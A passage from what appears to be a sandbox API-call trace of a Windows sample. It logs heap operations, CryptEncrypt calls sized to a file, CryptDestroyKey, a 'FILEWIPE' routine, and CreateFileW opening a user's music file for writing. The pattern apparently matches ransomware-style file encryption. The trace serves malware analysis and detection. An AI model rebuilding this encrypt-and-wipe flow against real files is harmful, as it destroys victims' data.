dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0181.874] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0181.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.876] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.876] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0181.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.877] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.877] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.877] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.877] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.877] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.877] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.877] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.878] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.878] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.878] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x675e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x6760) returned 1 [0181.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.879] CharLowerBuffW (in: lpsz="byte[26465]", cchLength=0xb | out: lpsz="byte[26465]") returned 0xb [0181.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.882] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbfd650*, pdwDataLen=0x87e820*=0x675e, dwBufLen=0x6760 | out: pbData=0xbfd650*, pdwDataLen=0x87e820*=0x6760) returned 1 [0181.906] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.918] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0181.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.918] CryptDestroyKey (hKey=0x90aed8) returned 1 [0181.919] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.919] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.919] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.919] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.919] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.919] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.919] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.919] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.919] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.919] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0181.919] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.920] FreeLibrary (hLibModule=0x74f20000) returned 1 [0181.924] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0181.925] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e18470, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0x2e730940, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x2e730940, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x675e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cxrsN5DPtYDsIm.wav", cAlternateFileName="CXRSN5~1.WAV")) returned 0x90af58 [0181.925] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0181.925] CharLowerBuffW (in: lpsz="byte[26462]", cchLength=0xb | out: lpsz="byte[26462]") returned 0xb [0181.926] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0181.926] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0181.926] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0181.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26c8 [0181.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.927] FreeLibrary (hLibModule=0x75c90000) returned 1 [0181.927] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0181.927] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0181.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0181.928] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0181.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0181.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba2e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0181.928] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\cxrsn5dptydsim.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0181.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0181.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0181.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0181.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0181.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0181.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0181.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0181.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0181.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd0770 | out: hHeap=0x8a0000) returned 1 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0181.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 